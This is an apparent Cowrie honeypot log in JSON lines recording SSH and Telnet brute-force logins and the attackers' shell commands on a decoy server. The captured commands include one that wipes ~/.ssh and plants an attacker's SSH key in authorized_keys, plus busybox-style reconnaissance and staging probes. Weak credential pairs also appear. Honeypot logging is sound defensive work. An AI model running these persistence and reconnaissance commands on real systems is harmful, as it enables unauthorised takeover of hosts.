{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T00:49:05.754550Z","src_ip":"212.227.235.229","session":"484a83e508ea"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48860,"dst_ip":"1.2.3.4","dst_port":22,"session":"dc9d2ee2d736","protocol":"ssh","message":"New connection: 212.227.235.229:48860 (1.2.3.4:22) [session: dc9d2ee2d736]","sensor":"my-vps","timestamp":"2025-08-31T00:49:08.999380Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T00:49:09.001087Z","src_ip":"212.227.235.229","session":"dc9d2ee2d736"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T00:49:09.068768Z","src_ip":"212.227.235.229","session":"dc9d2ee2d736"}
{"eventid":"cowrie.login.success","username":"root","password":"leomatos1992","message":"login attempt [root/leomatos1992] succeeded","sensor":"my-vps","timestamp":"2025-08-31T00:49:09.152539Z","src_ip":"212.227.125.160","session":"6afe017f3cc9"}
{"eventid":"cowrie.login.success","username":"root","password":"web2","message":"login attempt [root/web2] succeeded","sensor":"my-vps","timestamp":"2025-08-31T00:49:09.380141Z","src_ip":"212.227.235.229","session":"dc9d2ee2d736"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T00:49:09.530592Z","src_ip":"212.227.235.229","session":"dc9d2ee2d736"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T00:49:09.531352Z","src_ip":"212.227.235.229","session":"dc9d2ee2d736"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T00:49:09.532165Z","src_ip":"212.227.235.229","session":"dc9d2ee2d736"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:49:09.599666Z","src_ip":"212.227.235.229","session":"dc9d2ee2d736"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T00:49:09.795400Z","src_ip":"212.227.235.229","session":"dc9d2ee2d736"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T00:49:09.796280Z","src_ip":"212.227.235.229","session":"dc9d2ee2d736"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T00:49:09.865830Z","src_ip":"212.227.235.229","session":"dc9d2ee2d736"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:49:09.866918Z","src_ip":"212.227.235.229","session":"dc9d2ee2d736"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49272,"dst_ip":"1.2.3.4","dst_port":22,"session":"b33be8afa624","protocol":"ssh","message":"New connection: 212.227.235.229:49272 (1.2.3.4:22) [session: b33be8afa624]","sensor":"my-vps","timestamp":"2025-08-31T00:49:09.932423Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T00:49:09.933451Z","src_ip":"212.227.235.229","session":"b33be8afa624"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T00:49:09.999913Z","src_ip":"212.227.235.229","session":"b33be8afa624"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T00:49:10.309231Z","src_ip":"212.227.235.229","session":"b33be8afa624"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:49:11.378484Z","src_ip":"212.227.235.229","session":"b33be8afa624"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49812,"dst_ip":"1.2.3.4","dst_port":22,"session":"d1c79cbe9734","protocol":"ssh","message":"New connection: 212.227.235.229:49812 (1.2.3.4:22) [session: d1c79cbe9734]","sensor":"my-vps","timestamp":"2025-08-31T00:49:11.444883Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T00:49:11.445942Z","src_ip":"212.227.235.229","session":"d1c79cbe9734"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T00:49:11.512559Z","src_ip":"212.227.235.229","session":"d1c79cbe9734"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42708,"dst_ip":"1.2.3.4","dst_port":23,"session":"90b282716266","protocol":"telnet","message":"New connection: 212.227.235.229:42708 (1.2.3.4:23) [session: 90b282716266]","sensor":"my-vps","timestamp":"2025-08-31T00:49:11.582891Z"}
{"eventid":"cowrie.login.failed","username":"daemon","password":"admin123","message":"login attempt [daemon/admin123] failed","sensor":"my-vps","timestamp":"2025-08-31T00:49:11.754893Z","src_ip":"212.227.235.229","session":"484a83e508ea"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T00:49:11.820668Z","src_ip":"212.227.235.229","session":"d1c79cbe9734"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:49:11.888006Z","src_ip":"212.227.235.229","session":"dc9d2ee2d736"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:49:11.888869Z","src_ip":"212.227.235.229","session":"d1c79cbe9734"}
{"eventid":"cowrie.login.failed","username":"admin","password":"1234567890","message":"login attempt [admin/1234567890] failed","sensor":"my-vps","timestamp":"2025-08-31T00:49:12.555857Z","src_ip":"212.227.235.229","session":"90b282716266"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T00:49:13.357747Z","src_ip":"212.227.125.160","session":"6afe017f3cc9"}
{"eventid":"cowrie.command.input","input":"pwd","message":"CMD: pwd","sensor":"my-vps","timestamp":"2025-08-31T00:49:13.358412Z","src_ip":"212.227.125.160","session":"6afe017f3cc9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55212,"dst_ip":"1.2.3.4","dst_port":22,"session":"0bf274ef1d66","protocol":"ssh","message":"New connection: 212.227.125.160:55212 (1.2.3.4:22) [session: 0bf274ef1d66]","sensor":"my-vps","timestamp":"2025-08-31T00:49:13.360094Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:49:13.360907Z","src_ip":"212.227.125.160","session":"0bf274ef1d66"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:49:13.499493Z","src_ip":"212.227.125.160","session":"0bf274ef1d66"}
{"eventid":"cowrie.login.success","username":"root","password":"hunt5759","message":"login attempt [root/hunt5759] succeeded","sensor":"my-vps","timestamp":"2025-08-31T00:49:13.527896Z","src_ip":"212.227.235.229","session":"90b282716266"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T00:49:13.550241Z","src_ip":"212.227.235.229","session":"90b282716266"}
{"eventid":"cowrie.command.input","input":"enable","message":"CMD: enable","sensor":"my-vps","timestamp":"2025-08-31T00:49:13.861750Z","src_ip":"212.227.235.229","session":"90b282716266"}
{"eventid":"cowrie.command.input","input":"system","message":"CMD: system","sensor":"my-vps","timestamp":"2025-08-31T00:49:13.864508Z","src_ip":"212.227.235.229","session":"90b282716266"}
{"eventid":"cowrie.command.failed","input":"system","message":"Command not found: system","sensor":"my-vps","timestamp":"2025-08-31T00:49:13.866002Z","src_ip":"212.227.235.229","session":"90b282716266"}
{"eventid":"cowrie.command.input","input":"shell","message":"CMD: shell","sensor":"my-vps","timestamp":"2025-08-31T00:49:13.867142Z","src_ip":"212.227.235.229","session":"90b282716266"}
{"eventid":"cowrie.command.failed","input":"shell","message":"Command not found: shell","sensor":"my-vps","timestamp":"2025-08-31T00:49:13.869397Z","src_ip":"212.227.235.229","session":"90b282716266"}
{"eventid":"cowrie.command.input","input":"sh","message":"CMD: sh","sensor":"my-vps","timestamp":"2025-08-31T00:49:13.870313Z","src_ip":"212.227.235.229","session":"90b282716266"}
{"eventid":"cowrie.login.failed","username":"rancher","password":"rancher","message":"login attempt [rancher/rancher] failed","sensor":"my-vps","timestamp":"2025-08-31T00:49:13.875425Z","src_ip":"212.227.125.160","session":"0bf274ef1d66"}
{"eventid":"cowrie.command.input","input":"cat /proc/mounts; /bin/busybox HXPNP","message":"CMD: cat /proc/mounts; /bin/busybox HXPNP","sensor":"my-vps","timestamp":"2025-08-31T00:49:14.181169Z","src_ip":"212.227.235.229","session":"90b282716266"}
{"eventid":"cowrie.command.input","input":"cd /dev/shm; cat .s || cp /bin/echo .s; /bin/busybox HXPNP","message":"CMD: cd /dev/shm; cat .s || cp /bin/echo .s; /bin/busybox HXPNP","sensor":"my-vps","timestamp":"2025-08-31T00:49:14.495576Z","src_ip":"212.227.235.229","session":"90b282716266"}
{"eventid":"cowrie.session.closed","duration":"9.9","message":"Connection lost after 9.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:49:14.636403Z","src_ip":"212.227.235.229","session":"484a83e508ea"}
{"eventid":"cowrie.command.input","input":"tftp; wget; /bin/busybox HXPNP","message":"CMD: tftp; wget; /bin/busybox HXPNP","sensor":"my-vps","timestamp":"2025-08-31T00:49:14.808825Z","src_ip":"212.227.235.229","session":"90b282716266"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:49:14.950396Z","src_ip":"212.227.125.160","session":"0bf274ef1d66"}
{"eventid":"cowrie.command.input","input":"dd bs=52 count=1 if=.s || cat .s || while read i; do echo $i; done < .s","message":"CMD: dd bs=52 count=1 if=.s || cat .s || while read i; do echo $i; done < .s","sensor":"my-vps","timestamp":"2025-08-31T00:49:15.123315Z","src_ip":"212.227.235.229","session":"90b282716266"}
{"eventid":"cowrie.command.failed","input":"while read i","message":"Command not found: while read i","sensor":"my-vps","timestamp":"2025-08-31T00:49:15.126420Z","src_ip":"212.227.235.229","session":"90b282716266"}
{"eventid":"cowrie.command.input","input":"/bin/busybox HXPNP","message":"CMD: /bin/busybox HXPNP","sensor":"my-vps","timestamp":"2025-08-31T00:49:15.438545Z","src_ip":"212.227.235.229","session":"90b282716266"}
{"eventid":"cowrie.command.input","input":"rm .s; exit","message":"CMD: rm .s; exit","sensor":"my-vps","timestamp":"2025-08-31T00:49:15.441551Z","src_ip":"212.227.235.229","session":"90b282716266"}
{"eventid":"cowrie.command.input","input":"q","message":"CMD: q","sensor":"my-vps","timestamp":"2025-08-31T00:49:15.443009Z","src_ip":"212.227.235.229","session":"90b282716266"}
{"eventid":"cowrie.command.failed","input":"q","message":"Command not found: q","sensor":"my-vps","timestamp":"2025-08-31T00:49:15.444715Z","src_ip":"212.227.235.229","session":"90b282716266"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/38ce13d112d5e3b6ae4db83abebbf0a4c8a8d4662ffb9813dd08d6a40b8bd487","size":3550,"shasum":"38ce13d112d5e3b6ae4db83abebbf0a4c8a8d4662ffb9813dd08d6a40b8bd487","duplicate":false,"duration":"1.9","message":"Closing TTY Log: var/lib/cowrie/tty/38ce13d112d5e3b6ae4db83abebbf0a4c8a8d4662ffb9813dd08d6a40b8bd487 after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:49:15.446267Z","src_ip":"212.227.235.229","session":"90b282716266"}
{"eventid":"cowrie.session.closed","duration":3.8683059215545654,"message":"Connection lost after 3 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:49:15.451119Z","src_ip":"212.227.235.229","session":"90b282716266"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a1159e9df3670d549d04524532629f5477ceb7deec9b45e47e8c009506ecb2c8","size":6,"shasum":"a1159e9df3670d549d04524532629f5477ceb7deec9b45e47e8c009506ecb2c8","duplicate":true,"duration":"2.1","message":"Closing TTY Log: var/lib/cowrie/tty/a1159e9df3670d549d04524532629f5477ceb7deec9b45e47e8c009506ecb2c8 after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:49:15.452190Z","src_ip":"212.227.125.160","session":"6afe017f3cc9"}
{"eventid":"cowrie.session.closed","duration":"14.1","message":"Connection lost after 14.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:49:15.453835Z","src_ip":"212.227.125.160","session":"6afe017f3cc9"}
{"eventid":"cowrie.session.connect","src_ip":"201.148.180.50","src_port":50854,"dst_ip":"1.2.3.4","dst_port":22,"session":"1acd38d2379a","protocol":"ssh","message":"New connection: 201.148.180.50:50854 (1.2.3.4:22) [session: 1acd38d2379a]","sensor":"my-vps","timestamp":"2025-08-31T00:49:20.499951Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:49:21.967565Z","src_ip":"201.148.180.50","session":"1acd38d2379a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:49:21.968324Z","src_ip":"201.148.180.50","session":"1acd38d2379a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48104,"dst_ip":"1.2.3.4","dst_port":22,"session":"79e946ed6e1d","protocol":"ssh","message":"New connection: 212.227.125.160:48104 (1.2.3.4:22) [session: 79e946ed6e1d]","sensor":"my-vps","timestamp":"2025-08-31T00:49:23.408586Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:49:23.410240Z","src_ip":"212.227.125.160","session":"79e946ed6e1d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 